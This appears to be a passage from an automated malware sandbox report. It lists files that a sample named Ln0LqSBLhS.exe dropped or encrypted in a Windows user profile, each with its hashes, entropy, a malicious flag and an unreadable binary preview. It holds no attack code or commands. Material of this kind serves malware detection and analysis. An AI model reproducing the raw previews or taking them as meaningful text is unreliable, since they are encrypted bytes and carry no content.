                                                                                                                                                                                                    Preview: ...Dy......c.:..;._o:.b..........[.../I.M0..k..].p+..R.K1..B{..KgIY...s...L..K.4.gI.M0.....j...........\....yY.T....#....-!...1,..j...u..2Q.e...tS.#.pV....X.......a.....Q.|....G...R\].5R.....%.....RT....&......x..R.f^.......1.6U^C..m.....{v;.4|..c..?....T.....3Qm.$/....n.;.W......,...q...Y.....i...v....3...*...... ....*~.a`........{_.ww....d..CE.>.....;q/.c.Ux^..c.a,..S.i.3...k.zqzy........h,.....l..)....i...rn8.aD..... .....V.A*?...@0...|&..2./.0.3.?....*.29Hd.!.....b.l_.EX...........xt..c..`..c...Uf`'V.u~...M.4}.....0....|`*\....fE........V.}.c.-..[!>%s....C...p...N..)/.Y..zJ..".rY..WmZA.F..g.....UE.......3-.......Qb.....c.'R.h.L......Z$..<UJ{..Y:w/..N.....kEE.*..~......<j....Hg..F.#..q......=P.r0B..K.Fr..ry\(...?....N...w.meo'....3...?O2`;....j...P|...H..1....!.C..~]..e......O.b..i.R............'....=)..G.....7...?]..^.vvc.@.Z..^...{l....?/.B...Y.....[`D....>.?.k.Z...,.../....../........yf...L.r..../..|=..}td...l.9.t=h.M>..;G..2....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\UPPS\UPPS.bin
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16477
                                                                                                                                                                                                    Entropy (8bit):7.987865754234537
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:3zeU5v/qFjibqSqRSYWuWy8NzJMBSEFZBtmU2:jBF/qFWbq5tWdNt0SErmU2
                                                                                                                                                                                                    MD5:5DBD3BB664DA0E732754D9DADAD142FE
                                                                                                                                                                                                    SHA1:8B69876B806A8C96BBA6683FA99F698FD471E9DF
                                                                                                                                                                                                    SHA-256:134648118BFA3338F28DD035FF97267A29E7DA586A0A706F2F52236FCE8BC120
                                                                                                                                                                                                    SHA-512:E3AE7373061529E51E93B5EA29B4F41DE8F8AB31D8F909280B72B6A61D83B7DB9E42A00E222ED99BF96E64BC0D2CC992B4E08829D5A2909EF1A44979B13DE7C5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 7I....Q.x.H!......[.#B.........2..:A.)q...Z...`..cqZ..J..i........&.."..."c8...=8...-....">.3F...\.%.......1..... .#.....wz...+=..98-...).).`3.'.6..........]..w...r.%....wX$.x..-m....}.....km.H.Q..g....L..oxN.# ..d).,.<.&.a..[............t.|(X........xK..H...Fj0.......0.f.eAQ.p....q..3.........4]..O.S..j.oB......O7.s.0im...h.l,..8...}.....^q.w.a......lI..{.".7..5-o2y..6....A.jz.n...@g....=......=^.{.n....6.oG.....O..KhL....hJ.2.j..K1...P..SRZ."=.....d..4.u.1.DI...Q...w....[..K..u>.....c}..U.4.0w.|....1.....qs\.4.u.~...5..?;..."U....V.k..U...W..;.*{...Y.....^.r.^.k'..vM.3..-i........n..A$....T._....o.*.2.....L.....r..%N.../....s..P....u....+....J.F..R/y..C.$.....x.....qF>Q....>...!.<N...{...cx.s..:....8..g.ef......x. ..'M......H.& G.#k..i...4...@...q....4.*....4.....$..e..&z....L2.RU+=..}t...UB...x`..U..3..*.....B}&... ...)...wtc.......0.|.j.k7r..eN..f.a...e.Z...{k1....5?..K..J..>0....9..$.p..... ....V:....|..Y;...>.Z..@*.kg...X..^.s...~k0!
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97487046056124
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:hWQPItJ4dA/47M31V2HpdO++UzxajLISDE1w9MtOKk:x80k33nQu+jgoSD2w9MtY
                                                                                                                                                                                                    MD5:E7BC7A97BB9FAA478BAE5DF386BD4091
                                                                                                                                                                                                    SHA1:30D0AC23229C030479873C1B3F64BC4E151D39F6
                                                                                                                                                                                                    SHA-256:BD9FFCD6B693ACD3F95460A53A50C08B0DE9DE828F885DCAB44F986E92192FF3
                                                                                                                                                                                                    SHA-512:4BA7C4F0EBBACF9B07F782B28AC49BDDFDC418773E861C601561CF8A5310FA3BE169463399E7AA6995F99E2883D2B610F6729D18F26437E74619D5BC0341FAF6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...|+J|hw........0...Qe..*.q...#.....TF.S...y-".U.2...(gG..f#....A.....^d..%.17......D...bFe+.?...%..5,...c....Ba.o]x.G=5..7.........(.Si.......r..L<ED..JQ....r.]..E.7.....N.q.9u.....7.`A.smu$...x.K....s.[.y{.\._g.;;.C....K(C..t..u.....!Q4:.7.;lI...d[Gy$..|.z..:..(..O^..D#...cw.cz.#.P.......#[.....:.Yz.H.e;.%F.1.C8........C..q.7#,f.B...>.)k.?N.0.j.Wk.....b<.o...g..<...}.?...=..f+.i...!....B.....H..n-....s...cP...6p).g......-r}].t.P4......n..7<.}.w.aU...fI...^...<..n...n._.Me..[.F....sm.1:/4.B....>.P..Z....O/........H.....<.y.......F.._.]"..r.^6....u=....F.....ROj....b.. .vw..k.TA...O.j#..0q.#.)F.[.....~.]...v....M.......D#.YZ...=o.w*...f.C..y'.c..!W..C;.......n..... ..F...s..Y.R.7_;.........7~..^.L.7.,.v.c...cd.1..?de..}..Dr.w.s...2..d./`. ~.....m..........."B.q/.j.8MdG.C.P......x...[.&v...M._..b........../%L....t..4-.......NJ.......wD.Tr*..{..\.....]..M.~.c...;.u..]['..")...... ....U.QN+..`.Q..1|.-.F...v.LZ.{2P.8..{S>......pk.,x.h
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V010000A.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998968486415759
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:WNXhDTxdlaRSPZ0dbesIazJ1I84Q+w4dvi9b0qZK64DPwrXlq:W5hUwB0dbTZnIzQX4dvIb0/7PCXQ
                                                                                                                                                                                                    MD5:8538AEDA00A49F4E12C02B5634C15392
                                                                                                                                                                                                    SHA1:A7DFA21343BA491E987CFB02AA0F4EF21DB47DAC
                                                                                                                                                                                                    SHA-256:749E8E179935178367F0D13FA19B9899B45D3A07E2BA3F0A21F027EA85029A54
                                                                                                                                                                                                    SHA-512:4A91897AEB8A60D23796CD8C774C2F57FFFBC1C2E42BD6F0DC054E64A0B52E2EC1F04AFBABE504CA5A23C7BFBCC1858EC6A87E68E1530874AFFC8EE46FB39034
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..0z=.._...a"W...]..C..M.6A..J..*...l9[]J=(..#z..I.f...'......nG$.[...RsM{lq..U3...s..}..I.........j.B*#.(..l..w....$........hAD.......B.........J.t....N.I....1.... ;....V.............8.L.`....y.n.......b...;...o..E.( .w.j<.%sr~r.Q..K. _.U......%au:...z..+....*J.^....[.K.'~q2.q=~.F(...A&...1..h.u....86.......u..0'.....4*......r2....U"..j....?..!.F.Ph.M.j.Y1..I./.aC6..u...d.Q..w..`^.....b..i.x.G.V......c~u.....2v......xC..6.k.....8.M...fz.._......SLL.l......G.v).....H...y...\..5.Y!%N#.M1K...d.s3...].q._4..%4.-.....hR..y......o'...">.@B.9....i.{p.P..s.`.8..o.. ..iY.....C4Er.rL.......-\.n."..E.......F.}..r.t|.............Qi.Zg;.E.4I/...)...H..p.9.iT.~........[....U.N.w.9cS.q..+}j.pf.N..-{_.8r.3............v....T.i.o.."......F.`..4.t.3Q..I......6.|....5..Gw..Y..n!.....i..K.{.WMs.d...W..>.<@....}#.7.Z.....\....S..+$..........H....f..$@.pl...Z.......i..g.I....2..;.wY.{...j...H.%-.X,.s.f..Y,..'p+..m..L..].{va..s..0..Ey........}m.,.-
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V010000B.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998814288641655
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:mUcBrK4jbpHRvA800HeAKRrhcCUvcYzvl6hPDB51fogfFEVly2MkYZ3Q:mUurK4ntRh0ITlmDBZfFwKkOg
                                                                                                                                                                                                    MD5:42434CAAC877C889379DCF71B8A3FB7B
                                                                                                                                                                                                    SHA1:27B20801B9BEF8C4965C4C894970F9AD28882873
                                                                                                                                                                                                    SHA-256:5796BD7D3F315B21B1E548D44AD66441C711C84C0D3FACA6C8A3A061AC79C0A3
                                                                                                                                                                                                    SHA-512:6DB86EEC15E7C5751D8AEAAB6B24E8B712D04273A5162742F2BA3AC2BF9DE7E9B1ECAD8BBFAC609F4B53FFA9BBC3B89AC23A5AB15EE4CA8FE5C3A800FFC2CE9C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .3..(.J:....m.Um.gGV".."...ym}.>.*(.3...,.t.H{...`<....WL.....d\w.xM].W.....g.mc.1Gd!...Z..j.@...[.^.....U..{Nb3..Z......y.4...!.J".z..,._[4.a....X.zj..#V!.D].nn...Q.)......sF.v....9h....1.#d..O.<r..W.R..?I.T..../.7.bd..W...!...f.p.p..Z.B.~x{.!.Q.<.I.7...;(5.X?.q:..7...d<.@..n..Z..Z..3r.cbR..r..3..3.m.w.97.s.h..n......b.....{a.ol..:~s.D...5..:...C.....\a1...#. ..1.K,....A.y........|..a.a...t.a@.D.1...h.9.h.i..R...{g....$..sd.ff.....;...Z.E....'jI1p?.Qmw.5_y7...?.6...F.F...GJ......c.K.A....h>.K...b.q.-b:4>?.. .......'!..4:.N) ...p...k%8../g.v.:.)..-T....RM.g1@Q.2....Zv[?b..h_..C,.."..].......g...S.G..8..V7...N.%..........s..!4.C:g...Y..;w4|.u..J....6}..;.W.......j.-....)i3..=.J..mZ.1..o...^.A_.]h.m...U..I.\.xkDU.#.U..9.LB...^..Ofvt.P..iz.T...4.B,.@..:...1h_...?.s}..f..#W...|.%...k...G...~.^.r.}..Aa.u.X$..Z.....@RVI....W......Yn...o.8.u..m......v|..kq_.............rF.M.!o.......dW......@......_ ...5.5.....+j6.......m....$.T
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V010000C.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998774882957765
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:UXOoPaLvwYWclUvb+mvu4zdgZt8prS+Vhtq8wLbdczm+IAr:URijUqCu4pgx+Lt0Waw
                                                                                                                                                                                                    MD5:95B1CC14E4F1784546213F8DB0D262D6
                                                                                                                                                                                                    SHA1:AE4902185BA163CC0AACBCD237D5D8909C5F02C8
                                                                                                                                                                                                    SHA-256:E0A10501EAE604F11794B518E51228F3F178365B08EBE10E2FF2A38B7BFE1771
                                                                                                                                                                                                    SHA-512:1509BF9B0AD224CDB435643BB4C3931FDE3CF4A615FB6A856549130B2CEC5307D4E9205B520AEFA8990E73F08B55F4288499FBCEC2D59C9270E1DC04953D83F1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ".......2.".Zz..Z..b...&.... .......7i.."..@.T..[.j..e.X..^?.+S......+...R./l.._..3.T..1.h.....g.N#w.1JV....U"=.G..@......Z.....j.SmO.pu..s...a.|..<.....:E<.rCv...F'.....\}......b.-....|.yr`.W._......./.`..q...8}1].....-.D.7teY>L$...]P...m..[....>.7-..bb.)...7.X..I..WG.Y~.].e.Dv...U.q.pz. ..<.05.]G.=.i...X...J..tPl..c...j.8AlZ...sX .@."E...Q....$........5...j*.A.k..}....=...q....`.k....Z...w.J.....@:....O@....1..a.......UN.:".....P.....rw.3....P..*C.Q.....T.}g.en.|m...A .2yNy...!]]V..~....Lk47.c@D.|E..)......zG..*....roO$O|./..N..?.@..3.+"_"ke.j..\^..D=..W.Ek/.v.l...]m...~.>.o..U........W@....{.,_..'.#.p. ;.W.....0h....)......s.\07...Q.,.....o`@.....S.?.v....z..P..I.........4.X..(e..P.C.4...jh....h.m".`.9.B......i._1....%..Fv.g......_.BB...bI...y....w...a...f.yb..(]._.o..U.[......m...!....EnD.....)p.m.F.....5.M\*.......6..".,...=........t.$^d.(`P..5i..<.~xK.p.Lt..G..{.....`<k...........P...|.......3?..0...,.`.....l..k..#..N+......Z..%EK.Q.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00001.jrs
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998830259168441
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:g5vaQSEI2s21V3JXTcsS+6LthoTrvBdqeshTVqEqCU89jh:IaQSEIF2XtZ6L8BdXCTVZQs
                                                                                                                                                                                                    MD5:FAAFA545EB4AAEDFF5D9A858A0EEEB63
                                                                                                                                                                                                    SHA1:3223A848BFCF93DD26F41FC6EE8C3BE763F7E4F2
                                                                                                                                                                                                    SHA-256:8711B4A8461F02B77933F8C781B649D993D29D55D1852DD78D74EF8DC2561D67
                                                                                                                                                                                                    SHA-512:57A04A2B1C1A5CB8C8202EA3043D0A7531C780042C06596FAF673F94FD207F3A72A07CBFBA9B50C7DF1B6B72CDEDD58F936E2863D864DBF06DE1D15E069A6C87
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: G....M.b.K..*i........1..R.............R.-.I..;..l...........{.............5b...u.<4.80..0.7~C...]Qm.=...A.e]f.......z...'5..9k..1...G.4..UP`...j.(....:n1S..0..w.|.m.9....o.`..D.Ri...;.jeWr$.l9.7.e....ps.F"...C../..T..^A$[..,&,O.;.....*.D./.n'....>,;....N.m.e.`..OC.p...$.uT.<.aGx.L...k..............1...dz.I..)...<..H..........1..B...IDx.G...^W..M..k$)c?..w.T..X..u/.WQr..mWJK...9[...%G....]_........9..~.....q.C..F.....K#G.q....8.;.[[X.A.?.Z........C=`U....)S<f.r.R.w...y.^9xj..*...kqA......|..@...Nzo.[<%..O.E4..`0f...Q...I.]LW.j$},g..x....QR~... .>.U...f{.6u.|-...!to..V.3..B6.....p._..N..7..O..t..x..p.[.vH|w...o..[.;.j..t..L..I..M........[..Ox;.A....<R.-.?.e-.....F.&..EJ.]z.@..Lk.'.O...-......i!jm...Oq....,.........YS.q.J...\!P.....")K..NH.].)<<^..l.....G.@...k.?.....1.|...e.....R<0+.BJ+...............lc.T...ZY.....a..B.S........*.4r`S..............."..FY....+|...H.R...K...&t. ..g.O.f....W...s.E...Q.h.6s....ZAF.4;..g.\.....$.!...Z}..".a.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00002.jrs
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998871970637879
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:KD8tlzxLAsFKw88JsNwK6fwpVQyD0x5A5pt5teO/PXRYso1tl98B7yf:K4tx629JYw5fw4Yi5YpS13l2xyf
                                                                                                                                                                                                    MD5:994D509CD526A22BB700467640EE9B76
                                                                                                                                                                                                    SHA1:C1262FE4D930A908853E193BDC1EF90C605F6A08
                                                                                                                                                                                                    SHA-256:9ABE37171F8B5241EB1FC4C69ED0BF637D9F5F876D0F425E1DC4F532E18A7F1E
                                                                                                                                                                                                    SHA-512:7C20E76A47382FD03B1CCDB0C2180789C53EB62BE1FE716DC1DE4F2D589B78CEB3F47EE30B63EE7ACA58A8D02A7C78F0D7159C79497F8476EFDF0D61553877C5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: "..@...........T.6....R.ad.?.%.?.hk...8S. 6(.. .s...g....B.J.T0.n..q-..{%...R......V.C4...H.......).V".F..@=1.e*../M...|.oo.-z..*...B*...U..jx.<A....9.6<....... P..SY.b?FLf.}?..u.E.......>b.Y..x...4H...oe;.....}XE.*...h....=.....J.g..........L.#..(.T.b]!!.8.....s`..Q7.j...i}.u.U...G.c...a.U...G.G.'}.3.~"K....dG.?H.......aj..\.....W.w.1+Ju^.Q....0.^T.8.....[Y..}X...@J..J.....$X..cW.q.........Yw...Q.f..(g.aJe\...#...=|..R.u............?@.w<..`....p9....U.xjHQh...j..=.>...5...L0=....CDD..<..4w.?....y0..(h...X..U..5.E.u..PB3 [.e....V..$b...h.p.o.fY......(...v......).Q>.C.F..S..{X.I7....Pb....."!P..!........kg.J@.S.&b.O..8`.@%..l=x.s.%v... t...M.mDF}m.:..F2T..uW.5I..nr O.[.........;L.#&t....2...uj..MN....g..r.C./..O.U.D.X..@.5......M..l..W.^..~.U0.."..Z..0..N...0..X..;.........N.G2QsA......sR...[. .!..il..H.G)r..Yp..D;.m.>.r.c}.....C....H..b..A......P...bj....l#%.kWT.F.|G....>S...Yy..(.Zz..v..\.....-.vp.....|.<..Y....-......H@'..yb......F....9....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975560436548248
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:SDNNHbM5hsto8UUsY/qsWlXnMWh31BS+sAv1Hw2FjQ9gFcC6yL:s5hoFBfLlXlBSUHs2Zl
                                                                                                                                                                                                    MD5:183EC9C93692B770725B05763AC44DAA
                                                                                                                                                                                                    SHA1:F0AA5C3CDE5B9B03850B3A6F0A0A9820F959B94A
                                                                                                                                                                                                    SHA-256:6CD7E565EBD29F3F2E3196871D407718B856AD8273C159B445FC05D7577BBD7E
                                                                                                                                                                                                    SHA-512:358CE1CD470CC03EA7D9983B5A47BB5E9278AE96DEC176BFAE1CBC54EC7009011E3F8A6D53E3C7B6833ABEA1EA46A7A5C0AE747819B217A56544719616E8903C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: _......\.R8....$._"..}G.O*.72..?.F.`...5S....Udr....|........U...:.2..f?\...n..Z%. .9..I....5G..D..*g...tT..&i...&Y.....srd...q4...d.....D. .......V......I..D..TQO..h&MY.Q.zKZ.l..R...*d&Q..1.../.j.%.). ...g......_+.....1...Z6...\*.^.0.F..dD.!.m....._..4.+.3..c/B;.$*...{._..q%G....A3.&.yv#..s...`..Hm...xC5d8....n.......T..n.,*..[b..3.kE..[..!..V.V.`.H$.....q.4........k..[..b.ji....X5....B.G... `.....@0..W.!1..q..K.[.!g..J~.\{.....r..s%...}..3riQ........j.OJ.8..l(~zXrV........W..D.4|....4.O.S..T.l.E[..h..~.J...+...U...lP..Y....U3.K.Z.*..8.a4.d.p>'.7..%./3.^.c;..?..A^.....5..`X....jxv..9.... C....N..Q;l%Sn...5.8d"..;....0.;.#3O..*/....e.I.F.!..f8....t....X<y....C[..JL.g.z..g...=...}.qx...|.G.2/*...R&..".|...2+.`..Y.Ed....#c..^.......d..%+..T......n..{......u..lR......qx..S.).1...cc.......(....._...{...Z...@...].xr.y{e..[...!.;..LM.P.-M ...P..`.....y........ha..+$.a.!(.....L.....?d..-z.~..-.`..6.\.ts.oQ.".....&.he..j..u.BpDZ!....^......S.....i
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65865
                                                                                                                                                                                                    Entropy (8bit):7.996939014399484
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:TmRPeX1mCXtMK/FTVNfjc5WdNr0kNQ9Z2EeKIJ5skyKtgHOKiw/VAxy:lhXt7/Zp5N22hHdyKS7Ks
                                                                                                                                                                                                    MD5:809B7DD131AB6ECEAB342DA897791BE5
                                                                                                                                                                                                    SHA1:EAC6DF96BE4C0F3C09EF0C225A8135F191269A3F
                                                                                                                                                                                                    SHA-256:B8C24B463B800EE3D8786B4F8188EE28B7312018880065476C05F5E772988CB6
                                                                                                                                                                                                    SHA-512:A4E2CD36A8B7CD88E0F0288A9856065A252E9F214102E09565118B887D581485BB49F689089F53D4683492A37AD11CB482ED69D086CCCF7C2F98FA072517A48B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..<.U..^/3..@..W.U.B..%`..Qw7<...[$.3....E.cK."....`A|...k..E.*....7.........dG........%..$..J..&..B.BI\.........w....$]...:Y.{-B...y.h.u.s..ZQ..y..,K..QA~.L.."%.dC..".........-......6.H.....(..=.>...G.lk..6.$L..J...........i....Z..2.zh.S..&,02<4.}..{If...j.c..>J.Z*.....x...}.....4c...$.W5`3...@....~r.G...].fv.%...(.1Ur...=.)......Q5.d..A........57......5....C.R.....:...".y..K.v......9........%.L..:...5..!.A,j.I.D.....H...g...?..F.......F...W...H.6p..._?.+....].........&J.uFx..M.\Y2W9........ Z.U..c.s...Q.:zF!..A..+..?p.e.......8.jw.@./Hf9.$.2&..@.h........p..+.O.H....U.aQ.,3|T/.2.}W..v....+....<*8...Ua...-7......N.Oa......m.MX.....Z..7....%M....SV6..........<...3...Hd.W...D.>d...3j?q...3.b.....H|97..~9......8X.._=.>...t.S.V...3..4:../.].@j.Z..A.^....2p..~]...%pE.:u.Q...f].....D9}._...!.+.&...U8........V.qj.bS.....,U[.=...8.rlk..1o. !`-..].Y..9.|z6N.v.7......pb_..w.?y....~A...i...{...s.!..@N...M.@....e.....2n.K.......^..\.B......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65865
                                                                                                                                                                                                    Entropy (8bit):7.997383700416295
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:UKakjXHNX6l3UZeI2ZWOUthlgFdm9tCTPA+9m9VSup+c:UaMuydUbwmXiNm/j0c
                                                                                                                                                                                                    MD5:35D33E7AF2C632BB5CA64774A1EAAB62
                                                                                                                                                                                                    SHA1:772B2366B963A4F6EA559556B36B90C41DA8E530
                                                                                                                                                                                                    SHA-256:ADD1C4AF2FC0FE2149658825673B88ED4FC3CCA82B624B01E78B98EABC5C33A6
                                                                                                                                                                                                    SHA-512:E2DB1F8A659D3B3B854B0FFF18A835CACD14FAB24212430AAB22C9ECCCC00C42A541DDA0586C9696FCD803B1363E99AB10C80A125E35B715B2AFC481AC297154
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .B.....=`.A~]h.........~.E:.R.K.S....Mu0<.P..X)eo.tZ.n..`.....'.@:9F.+..Z...+y4...=F....E.-..z.z\=.7q......|U.t.,T.".y..A...y.YO..X..&c...........S..,..[..B...........L..i'ZV.f.w....%.....R....%j...,.w...K>g.n.1..K...eV..~[...o...KA|...^.f.k....;.X..-...7.....)>....I+...:+.\..j....c".q.b}(l...|.B..........}..........:.S..K..{i...l..3..<._.....~%.}'ZB.H.1..H6.....!.[...g..\}..C.X....t.L.D..s.j..Sv|.G....C...?R.G .9...._..bqa..UWV.O.Z..>..q..F....x.r`]Z....,2w.....[........S7i.&.T....V)..M,....*j..}.z......M'..].'.~...\.{4......Ii.......D#ev.....c........S|.VQ.....6...{<X......5T.n.)V.'.`...../.%R..s......*.m.<..i.v.......b~.L8.....{.t'.L........-.'....=..XT...?0....]s....L.R..&!.+._.9.*.=:.J....2.. .....,f1.4.0~.F....1.+../k^0. ^...*..)...+.V'...6Qt_.......v.L}...s..].;P@....]y....#..z...r.[..n@..-s..H.\.K.. ..X-Hq.^...Je`)-.z.l..+....5...a{.....|w.uM...{... ....(.CHz&...........M.Ic..?......YX.....@"FS.....!..P.r-.$....w\(H&.....K.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):131401
                                                                                                                                                                                                    Entropy (8bit):7.998614638809877
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:JmU8XW16Hne1hkYF6tR082bDAYk32aTMg2mfSva+JT/2jqNT:b8C71hkjDQbEJMg2kQt/rl
                                                                                                                                                                                                    MD5:C12B927600D30AED243AC9F64FE55AB5
                                                                                                                                                                                                    SHA1:D7D08855E52B396C8CD06A24B11FC9A8034E45A8
                                                                                                                                                                                                    SHA-256:97F05347E1CD553A1F393CB2D2CAB7FDF2ADFF67B84C318D389E09998DD004EA
                                                                                                                                                                                                    SHA-512:67E0C8D86A152D32A0082CC225CD12DE1859D0BD7799366052EEB431CEEBFB45EB471211634791E31141F9E7684C353B6E52A466E770E26F104B9858642AA261
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....O...]).....Ql.x..E.%..K`..&.e0.{..O$V..S.W...*#..W.(....Q....+.%;.V'}.\E6.-.6....II.r w(..8( .h.4&...nG...#.........i..u......>.3..]2'.y..X4..?P.a.^,..XZ.<.gM.FqR.......C..).3.MnD.`...u.mz./...\G{V7T&.....v.......K+..t.......>(x[.[.I.~_.g..d.'.1....yrK....G=S.#9....F.g...E.ezm.*.[..wld.!.10.`.3.^e<...Uh1....'..j%...Y9k..2gW.}...>Yd.(..wb..t..h=...6..$..[.w/\...B`.L)z....D...@.?..4.A...z*36...yyZTU.........h$.mEF...A...mu.(q...G.n-.o.ob*_u..l.;..G..!.7to.A9..!"...$..^.ik...8.74S.n...3..8tl..Z..a)..S.r.X.>1...S.'.EC.e.......{)..tB......Z4....T......."..B.Oj{..G...+.\vG.`.....&..<1...q.......X..v..Rg.s...........Y.O.o....`q..MOy_.2.....H...)%Iq...*.}>.(...jdo..O....I&}....kD.=...>.F......Y|.DE.......1gT.#......Z.n.....Z..:....l..C..3..%.<.H..ae.cA.P......h..=4......^.......J..VI...3......<.....ww....*"..=4fV.j.{.a...~.....t.6.)..5.d..\....8. ..+...O.ibP1...C..:b........*...$.....].j.>..*D~i;..@.C......X.).+....._.u.!..R.+.k.j..5g.........L.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65865
                                                                                                                                                                                                    Entropy (8bit):7.9977919361326
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:iF6bZqc2AAmxKQfDfbp5PxIt3hIp6cKinTVZbiTL4dKqsSgT/S2:iF6bZqjVmxlfDTp5ZIt326c/fWXzpSgh
                                                                                                                                                                                                    MD5:8EA23D265447F3088BE3A2A991CBBC55
                                                                                                                                                                                                    SHA1:3880788B7BBB3FEAD74448A251C69937476C6B47
                                                                                                                                                                                                    SHA-256:C56307A3A35AD9C67525341420A82639AA935803042BA4B9D9EDF06FA802CD44
                                                                                                                                                                                                    SHA-512:33C94C69168331200A9B6BC359CEA1CA61D705F39029A1AEAF3A9BFD975065E3E01EF02F161A5F2194A89AAD041033C07EE1FD9387754E7F65045D8B68DB6EE1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
